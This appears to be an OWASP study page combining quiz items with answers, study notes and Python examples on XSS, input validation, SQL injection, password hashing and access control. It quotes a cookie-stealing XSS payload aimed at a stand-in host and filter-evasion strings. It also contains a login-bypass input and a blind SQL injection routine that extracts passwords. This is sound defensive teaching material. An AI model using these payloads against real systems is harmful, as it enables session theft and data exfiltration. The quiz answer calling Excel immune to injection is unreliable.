OWASP Overview and Core Values

Questions and Answers

What should be ensured when storing sensitive data?

  • Use weak algorithms to increase processing speed.
  • Ensure that the cryptographic protection remains secure even if access controls fail. (correct)
  • Only store sensitive data that is outdated.
  • Sensitive data should be encrypted with any method available.

Which of the following practices supports good cryptographic storage design?

  • Storing plain text passwords for easy access.
  • Using strong approved Authenticated Encryption. (correct)
  • Keeping cryptographic keys publicly accessible.
  • Avoiding regulations on the use of cryptography.

What is a common issue related to insecure dependencies?

  • Using software that is vulnerable, unsupported, or out of date. (correct)
  • Knowing the version of dependencies accurately.
  • Monitoring component configuration regularly.
  • Regularly patching outdated software components.

Which action contributes to preventing issues related to dependencies?

    Continuously monitoring for vulnerabilities.

    What is an ineffective approach to securing software components?

    Patch management processes are insufficient or missing.

    What is the primary approach of Allow List Input Validation?

    Block all user inputs unless explicitly allowed

    Which of the following is an example of a situation where Client Side Validation can be bypassed?

    By editing headers and data in a browser's developer tools

    What is a major drawback of using Block List Input Validation?

    It must be regularly updated to address new attack patterns

    What does injection in the context of application security refer to?

    Executing unintended commands in an application

    Which statement best describes the nature of Allow List Input Validation?

    It stays effective against attack patterns that did not exist when it was written, because only explicitly permitted input is accepted

    How should an HTML sanitizer be utilized when handling user input?

    By sanitizing larger HTML chunks provided by the user

    What is a common method attackers use to exploit broken access control?

    Changing the primary key to another user's record

    Which type of privilege escalation involves accessing another user's data at the same level?

    Horizontal Privilege Escalation

    What is a significant characteristic of negative security rules in input validation?

    Require a comprehensive understanding of potential attacks

    Which of the following is a recommended prevention measure for access control issues?

    Deny access to private resources by default

    Which of the following is NOT a potential interpreter type where injection can occur?

    Excel

    What should access tokens do upon user logout to enhance security?

    Be invalidated on the server

    What is an effective way to enforce access control mechanisms within an application?

    Reuse access control mechanisms throughout the application

    Which of the following describes the practice of force browsing?

    Attempting to view authenticated pages as an anonymous user

    What is a key reason to log access control failures?

    To alert administrators when appropriate

    What does the principle of Defense in Depth primarily emphasize?

    Implementing multiple barriers to manage risks

    What is the recommended outcome when a transaction fails?

    Fail closed to prevent unauthorized access

    Which of the following is NOT a common attack related to broken access control?

    Data encryption attacks

    Why should external systems be treated with caution?

    They might vary in security posture and policies

    What role does Separation of Duties play in security?

    It prevents fraud by clearly dividing responsibilities

    What criticism is associated with Security by Obscurity?

    It relies solely on keeping security details hidden

    What is a key advantage of keeping security simple?

    It reduces the attack surface and improves efficiency

    What should be avoided when developing secure systems?

    Incorporating complex architectures unnecessarily

    What does failing securely prevent?

    Unauthorised access during a failure

    What is a primary characteristic of Reflected XSS?

    User input is included in HTML output without validation.

    Which of the following examples demonstrates a successful payload for stealing user sessions in an XSS attack?

    new Image().src="http://ev.il/hijack.php?c="+encodeURI(document.cookie);

    What is the main risk associated with Stored XSS vulnerabilities?

    They can impact multiple users who access stored input.

    In the context of XSS, what does DOM XSS primarily involve?

    JavaScript frameworks dynamically incorporating problematic data.

    What is a common method used in an XSS redirect attack?

    Changing the window location with JavaScript.

    Which link is an indication of a possible phishing attempt in the lottery scenario?

    http://ev.il/hijack.php

    What is the aim of the 'document.body.background' payload in an XSS attack?

    To change the background of the webpage to a malicious image.

    What generally happens when a user inputs data in an unsafe manner within a search field?

    Potentially dangerous scripts may be executed.

    What is the primary mission of OWASP?

    To improve the security of software

    Which of the following is NOT listed as a core value of OWASP?

    Security Innovation

    Which vulnerability class lets an attacker deliver a malicious script that runs in another user's browser?

    Cross-Site Scripting (XSS)

    What are typical impacts of XSS attacks?

    Steal a user's session

    What is a critical root cause of XSS vulnerabilities?

    Including untrusted data into dynamic content without validation

    Which component is NOT part of the OWASP Top 10 list?

    Cross-Origin Resource Sharing

    What principle does OWASP uphold regarding community participation?

    Global participation is encouraged

    Why does a user's browser trust the malicious script in an XSS attack?

    It arrives as part of a page served by the trusted site, so the browser runs it with that site's privileges

    Which action is a common characteristic of XSS attacks?

    Redirecting users to malicious websites

    What does OWASP's commitment to openness entail?

    All finances and code are transparently shared

    Study Notes

    OWASP (Open Web Application Security Project)

    • OWASP is a non-profit foundation dedicated to improving software security
    • It utilizes a community-driven approach with open-source projects
    • The foundation offers numerous local chapters worldwide
    • OWASP boasts tens of thousands of members
    • It is a leading source of educational and training resources for developers and technologists to secure web applications

    Core Values

    • Open: Transparency in finances and code is paramount
    • Innovative: Encourages exploration of new solutions for software security challenges
    • Global: Welcomes participation from anywhere in the world
    • Integrity: Fosters a respectful, supportive, truthful, and vendor-neutral community

    OWASP Top 10

    • This is a prioritized list of the most critical web application security risks
    • The list is regularly updated to reflect emerging threats
    • The OWASP Top 10 serves as a guide for developers to strengthen their applications against common vulnerabilities

    Cross-Site Scripting (XSS)

    • Attackers can inject malicious scripts into a web application
    • The user's browser executes the malicious script, thinking it originates from a trusted source
    • Attackers can steal user sessions, sensitive data, and rewrite HTML pages
    • Vulnerabilities arise when untrusted data is included in dynamic content without validation

    Root Cause of XSS

    • Applications often incorporate untrusted data from HTTP requests into dynamic content
    • Failure to validate this data for malicious content creates the vulnerability

    Typical XSS Impacts

    • Stealing user sessions
    • Accessing sensitive data
    • Manipulating web page content
    • Redirecting users to malicious websites

    XSS Exploit Example

    • A web application's search field accepts input without validation
    • An attacker can enter malicious HTML code (e.g., an image tag with a malicious URL)
    • The application displays the attacker's code, executing it in the victim's browser

    XSS Payload Examples

    • Stealing user sessions
    • Site defacing
    • Redirecting users

    Forms of XSS

    • Reflected XSS: unvalidated input from the current request (e.g., a query parameter) is echoed straight back into the HTML response
    • Stored XSS: unsanitized input is saved (e.g., in a database) and rendered to every user who later views it
    • DOM (Document Object Model) XSS: client-side JavaScript, often a framework or templating library, takes attacker-controlled data such as part of the URL and writes it into the page

    XSS Prevention

    • Do not include user-supplied input directly in your output
    • Encode all user-supplied input
    • Use input validation (allow-listing) to specify acceptable input
    • Use HTML sanitizers for complex user input
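The first two prevention bullets in practice, as an added example that is not code from the original page: a search term rendered straight into HTML beside the same term encoded for each context it lands in. Standard library only; the HTML fragments, the `render_search_*` functions and the attacker payload are constructed here (the host ev.il is the one the page's own payload uses).

```python
"""Reflected XSS: a search term rendered unsafely, then rendered with
context-appropriate output encoding.

Added example, not code from the original page. Standard library only; the
HTML fragments and the attacker payload are constructed for the demo.
"""
import html
from urllib.parse import quote

# Constructed attacker input of the kind the notes describe: an <img> whose
# error handler sends the session cookie to an attacker-controlled host.
PAYLOAD = (
    '<img src=x onerror="new Image().src='
    "'http://ev.il/hijack.php?c='+encodeURI(document.cookie)\">"
)


def render_search_unsafe(term: str) -> str:
    """Vulnerable: user input is concatenated straight into the HTML output."""
    return f"<h1>Results for: {term}</h1>"


def render_search_safe(term: str) -> str:
    """Hardened: each dynamic value is encoded for the context it is placed in.

    Body text and quoted attribute values get HTML entity encoding (and the
    attribute must actually be quoted); a value that lands inside a URL query
    string gets percent-encoding instead.
    """
    encoded = html.escape(term, quote=True)   # < > & " ' become entities
    in_url = quote(term, safe="")             # query parameter: percent-encode
    return (
        f"<h1>Results for: {encoded}</h1>"
        f'<input type="text" name="q" value="{encoded}">'
        f'<a href="/search?q={in_url}">Permalink</a>'
    )


def payload_is_live(markup: str) -> bool:
    """True if the injected <img> survives as a real tag in the rendered page."""
    return "<img" in markup
```

Encoding is applied at output time, per context, rather than by "cleaning" the input once: the same string needs entity encoding in the body and percent-encoding in the link, and the attribute value is only safe because it is both encoded and quoted.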

    Input Validation - Block List

    • This method rejects input that matches known-bad characters or patterns
    • Drawback: vulnerable to masking (case changes, encoding, alternative syntax) and must be updated every time a new attack pattern appears

    Input Validation - Allow List

    • Only allows specific characters or patterns
    • Advantage: stays effective against attacks not yet known, because anything outside the defined set is rejected
    • Disadvantage: Defining the acceptable input characters can be complex
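Both validation styles run over the same inputs, as an added example that is not from the original page, covering the Block List and Allow List sections above. The block list, the username rule and the evasion inputs are all constructed here; the point is how each validator behaves on input it was not written against.

```python
"""Block-list versus allow-list validation on the same inputs.

Added example, not from the original page. The patterns, the username rule
and the evasion inputs are all constructed for the demo.
"""
import re
from urllib.parse import unquote

# A block list of the kind a first attempt usually produces: known-bad strings.
BLOCKED_PATTERNS = [
    re.compile(r"<script"),
    re.compile(r"javascript:"),
    re.compile(r"onerror="),
]


def blocklist_validate(value: str) -> bool:
    """Negative rule: accept unless the input matches something known to be bad."""
    return not any(p.search(value) for p in BLOCKED_PATTERNS)


def canonicalize(value: str) -> str:
    """Decode what the application will decode later, then check. A block list
    that skips this step is bypassed by simply encoding the attack."""
    return unquote(value).lower()


def blocklist_validate_canonical(value: str) -> bool:
    return blocklist_validate(canonicalize(value))


# Positive rule for a username field: 3-32 characters from a small fixed set.
USERNAME_RE = re.compile(r"[A-Za-z0-9._-]{3,32}")


def allowlist_validate(value: str) -> bool:
    """Accept only what is explicitly defined as valid; everything else fails."""
    return USERNAME_RE.fullmatch(value) is not None


# Masking techniques from the notes: the same attacks, reshaped. Constructed.
EVASIONS = {
    "mixed case": "<ScRiPt>alert(1)</ScRiPt>",
    "url-encoded": "%3Cscript%3Ealert(1)%3C/script%3E",
    "other handler": '<img src=x onload="alert(1)">',
    "space before =": '<img src=x onerror ="alert(1)">',
    "tab in scheme": "java\tscript:alert(1)",
}


def accepted_by(validator, inputs: dict) -> set:
    """Names of the inputs a validator lets through."""
    return {name for name, value in inputs.items() if validator(value)}
```

Canonicalizing before the block-list check closes two of the five holes; the other three need new patterns, which is the maintenance burden the notes describe. The allow list rejects all five without knowing any of them, at the cost of having to define the accepted set up front.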

    Bypassing Client-Side Validation

    • Client-side validation is for convenience, not security
    • It can be easily bypassed by directly interacting with the back-end

    Injection (Example: SQL Injection)

    • Tricking an application into including unintended commands in data sent to an interpreter
    • Interpreters Affected: Query languages (SQL, NoSQL, HQL, LDAP, XPath), Expression languages (SpEL, JSP/JSF EL), Template engines (Freemarker, Velocity), Command-line interfaces (Bash, PowerShell)

    SQL Injection - Typical Impact

    • Bypassing authentication
    • Reading (exfiltrating) data the user should not see
    • Manipulating data
    • Complete system takeover

    Blind SQL Injection

    • Attackers don't get direct error messages
    • They use boolean conditions to deduce if the query succeeds or fails
    • This process takes time to complete and can be slow

    Prevention for SQL Injection

    • Avoid constructing SQL statements with string manipulation
    • Utilize prepared statements, parameters, or parameterized queries
    • Use a safe API (such as an ORM or query builder) that never hands user input to the interpreter as code
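The three SQL injection sections above (impact, blind injection, prevention) in one runnable piece, as an added example that is not from the original page: a login query built by string concatenation, the same query parameterized, and a boolean-blind oracle that recovers a column value from a lookup that only answers found/not found. It uses an in-memory SQLite database; the table, users and secrets are constructed for the demo.

```python
"""SQL injection in a login form: the string-built query, the same query
parameterized, and a boolean-blind oracle that reads data one bit at a time.

Added example, not from the original page. In-memory SQLite with constructed
rows; the schema, users and passwords are made up for the demo.
"""
import sqlite3
import string


def setup_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT, role TEXT)"
    )
    # Constructed rows. Passwords are in clear ONLY so the extraction below has
    # something readable to pull; a real system stores salted hashes.
    conn.executemany(
        "INSERT INTO users (username, password, role) VALUES (?, ?, ?)",
        [("admin", "Tr0ub4dor&3", "admin"), ("alice", "correct horse", "user")],
    )
    return conn


def login_vulnerable(conn, username: str, password: str):
    """Builds the statement by string manipulation: input becomes SQL.
    Username  admin' --  comments out the password check entirely."""
    sql = (
        "SELECT username, role FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    return conn.execute(sql).fetchone()


def login_parameterized(conn, username: str, password: str):
    """Same query with placeholders: the driver keeps data and code separate."""
    sql = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()


def user_exists_vulnerable(conn, username: str) -> bool:
    """A lookup that reveals only 'found / not found': enough for blind injection."""
    sql = f"SELECT 1 FROM users WHERE username = '{username}'"
    return conn.execute(sql).fetchone() is not None


def user_exists_parameterized(conn, username: str) -> bool:
    sql = "SELECT 1 FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchone() is not None


# Characters tried per position. A real attacker uses char() codes and a binary
# search rather than a linear scan, but the idea is the same.
ALPHABET = "".join(c for c in string.printable if c not in "'\r\n\t\x0b\x0c")


def blind_extract(conn, target_user: str, column: str = "password", max_len: int = 32):
    """Recover a column value through the true/false oracle, one character at a time.
    Slow (one request per guess), which is the cost the notes mention."""
    def oracle(condition: str) -> bool:
        return user_exists_vulnerable(conn, f"{target_user}' AND {condition} --")

    length = next((n for n in range(1, max_len + 1) if oracle(f"length({column}) = {n}")), None)
    if length is None:
        return None
    recovered = []
    for pos in range(1, length + 1):
        for ch in ALPHABET:
            if oracle(f"substr({column}, {pos}, 1) = '{ch}'"):
                recovered.append(ch)
                break
        else:
            recovered.append("?")
    return "".join(recovered)
```

The parameterized versions answer the same questions but treat `admin' --` as a literal username that does not exist, so neither the bypass nor the oracle works against them.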

    Prevention: Hardening the Application Stack

    • Missing security hardening anywhere in the stack is a common configuration flaw
    • Install the latest versions of application components
    • Properly configure and secure permissions in cloud services
    • Disable unnecessary features
    • Ensure default accounts and passwords have been disabled or changed

    Typical Flaws in Authentication

    • Allowing brute-force attacks
    • Implementing weak password recovery processes
    • Using insecure password storage methods (e.g., plain text, weak or unsalted hashing)
    • Forgetting multi-factor authentication
    • Exposing session IDs in the URL

    Password Strength Controls

    • Enforce minimum password length, avoiding periodic password resets
    • Ban commonly breached passwords
    • Offer password visibility or clipboard pasting options

    Secure "Forgot Password" Mechanism

    • Provide uniform messages for both existing and non-existent accounts
    • Use a side channel (e.g., phone call, email address) for password reset instructions
    • Utilize URL tokens for password reset

    Secure Password Storage

    • Use bcrypt (or equivalent) password hashing algorithms
    • Set a work factor high enough that brute-force cracking of a leaked hash database is slow
    • Use a unique salt per password (modern algorithms generate one automatically)
    • Consider a pepper: a server-side secret kept outside the database and mixed into the hash (less common, but a leaked table alone then cannot be cracked)
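The four bullets above implemented together, as an added example that is not from the original page. It uses PBKDF2-HMAC-SHA256 from the standard library in place of bcrypt (the notes say "or equivalent"); the self-describing record format, the pepper handling via an environment variable, and the iteration count are this example's choices.

```python
"""Salted, peppered, work-factor-tuned password hashing with a self-describing
record format so the work factor can be raised later.

Added example, not from the original page. PBKDF2-HMAC-SHA256 stands in for
bcrypt; record format, pepper source and iteration count are example choices.
"""
import hashlib
import hmac
import os
import secrets

ITERATIONS = 600_000      # work factor: raise as hardware gets faster
SALT_BYTES = 16
# Pepper lives outside the database (env var here, a secret manager in production).
_PEPPER = os.environ.get("PASSWORD_PEPPER", "").encode()


def _pepper(password: str) -> bytes:
    """Mix the server-side secret in before hashing; an empty pepper degrades
    to plain PBKDF2 so the demo runs without configuration."""
    if not _PEPPER:
        return password.encode()
    return hmac.new(_PEPPER, password.encode(), hashlib.sha256).digest()


def hash_password(password: str, iterations: int = ITERATIONS) -> str:
    salt = secrets.token_bytes(SALT_BYTES)  # unique per password
    digest = hashlib.pbkdf2_hmac("sha256", _pepper(password), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
    algo, iterations, salt_hex, digest_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac(
        "sha256", _pepper(password), bytes.fromhex(salt_hex), int(iterations)
    )
    return hmac.compare_digest(digest, bytes.fromhex(digest_hex))  # constant time


def needs_rehash(stored: str, iterations: int = ITERATIONS) -> bool:
    """On a successful login, re-hash records made with an older work factor."""
    return int(stored.split("$")[1]) < iterations
```

Storing the algorithm and iteration count beside the hash is what makes raising the work factor later painless: verify with the old parameters, then re-hash with the current ones while the plaintext is in hand.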

    Other Authentication Controls

    • Use TLS (secure communication protocol)
    • Implement strategies such as throttling for brute-force prevention
    • Require re-authentication for sensitive features
    • Offer two-factor or multi-factor authentication

    Two-Factor Authentication (2FA)

    • Requires two out of three types of credentials (Something you know, Something you have, Something you are)

    Broken Access Control

    • Applications incorrectly handling user permissions expose unauthorized functionality.
    • Possible Impacts: Unauthorized access, view sensitive files, modify data, change access rights, and other privileged actions.

    Access Control Design Principles

    • Thoroughly design access controls up front
    • Enforce access checks for all requests
    • Deny access by default (unless explicitly granted access)
    • Enforce principle of least privilege
    • Avoid hardcoding roles
    • Log all access control events
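The design principles above applied in code, as an added example that is not from the original page: a central deny-by-default policy, an object-level ownership check that stops the changed-primary-key attack from the quiz, server-side session invalidation on logout, logging of every denial, and fail-closed handling of anything unexpected. The policy table, users, records and audit list are constructed for the demo; in a real system they live in your identity provider and database.

```python
"""Deny-by-default access control with object-level ownership checks,
fail-closed request handling and server-side session invalidation.

Added example, not from the original page. Policy, users, records and the
audit list are constructed for the demo.
"""
import secrets
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class User:
    id: int
    roles: frozenset


@dataclass(frozen=True)
class Record:
    id: int
    owner_id: int
    body: str


# Central policy: action -> roles allowed. An action missing here is denied.
ROLE_POLICY = {
    "record:read": {"user", "admin"},
    "record:delete": {"admin"},
}

# Constructed data: two users, two records (102 belongs to a third user).
ALICE = User(1, frozenset({"user"}))
ADMIN = User(2, frozenset({"admin"}))
RECORDS = {
    101: Record(101, ALICE.id, "alice's notes"),
    102: Record(102, 3, "someone else's notes"),
}

AUDIT = []  # (user_id, action, record_id, reason) for every denial


class AccessDenied(Exception):
    pass


def authorize(user: User, action: str, record: Optional[Record] = None) -> None:
    """Deny unless the role policy allows the action AND, for owned objects,
    the caller owns the object (admins excepted). Raises on any failure."""
    if not (user.roles & ROLE_POLICY.get(action, set())):
        raise AccessDenied("role not permitted")
    if record is not None and "admin" not in user.roles and record.owner_id != user.id:
        # The primary key points at another user's row: horizontal escalation.
        raise AccessDenied("not owner")


class SessionStore:
    """Tokens are random and resolved server-side, so logout really revokes them."""

    def __init__(self):
        self._sessions = {}

    def login(self, user: User) -> str:
        token = secrets.token_urlsafe(32)
        self._sessions[token] = user
        return token

    def user_for(self, token: str) -> Optional[User]:
        return self._sessions.get(token)

    def logout(self, token: str) -> None:
        self._sessions.pop(token, None)  # invalidated on the server, not just the client


def handle_request(store: SessionStore, token: str, action: str, record_id: int) -> str:
    """Every request is checked; any error during the check fails closed."""
    user = store.user_for(token)
    try:
        if user is None:
            raise AccessDenied("no valid session")
        record = RECORDS[record_id]  # KeyError for unknown ids is caught below
        authorize(user, action, record)
        return f"{action} ok: {record.body}"
    except Exception as exc:  # AccessDenied, KeyError, anything unexpected
        AUDIT.append((user.id if user else None, action, record_id, repr(exc)))
        return "denied"
```

Note that `authorize` is the single mechanism every handler reuses, and that it is called with the loaded object, not just the id: role checks alone would still let Alice read record 102.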

    Sensitive Data

    • Data like passwords, credit card numbers, personally identifiable information (PII), and business secrets warrants special protection.
    • Following data protection regulations (e.g., GDPR, PCI DSS) is crucial

    GDPR (General Data Protection Regulation)

    • A comprehensive data privacy regulation in the EU
    • Addresses the protection of personal data and the data processing

    Secure Cryptographic Storage Design

    • Store sensitive data only when genuinely needed; encrypt it with strong, approved authenticated encryption, and store passwords as salted hashes rather than encrypting them
    • Ensure the cryptographic protection holds even if access controls fail (a leaked database dump must still be unreadable)
    • Protect secret keys from unauthorized access and keep them separate from the data they protect, following applicable regulations on the use of cryptography

    Insecure Dependencies

    • Applications using vulnerable, outdated, or unmaintained dependencies increase attack surface
    • Use scanners and continuously monitor versions for known vulnerabilities and security bulletins

    Insecure Configuration

    • Employ appropriate server hardening measures
    • Properly configure permissions and disable unused/unnecessary components
    • Disable or change default accounts and passwords

    Secure Design Principles

    • Minimize attack surface area
    • Enforce strong default security configurations for new application features
    • Provide least privilege access to users
    • Apply defense in depth: layer multiple independent controls so that one failure does not expose the system
    • Ensure secure failure states when transactions/code execution fail

    Don't Trust Services

    • External services should not be trusted implicitly
    • Treat all external services as potentially hostile entities

    Separation of Duties

    • Divide administrative duties so that no single person can both perform and approve a sensitive action
    • Limits fraud and the damage a single compromised or malicious administrator can do

    Avoid Security by Obscurity

    • Hiding implementation details (URLs, source code, configuration) must never be the sole security measure
    • Obscurity may add friction for an attacker, but real controls (access control, encryption, validation) must stand on their own

    Keep Security Simple

    • Maintain an uncomplicated and straightforward design.
    • Prioritize clean code over intricate, complex approaches.
    • Avoid complex designs or double negatives where simpler approaches are available.

    Description

    Explore the Open Web Application Security Project (OWASP), a non-profit foundation dedicated to enhancing software security through community-driven initiatives. Learn about its core values, the significance of the OWASP Top 10, and how this organization empowers developers to address web application security risks effectively.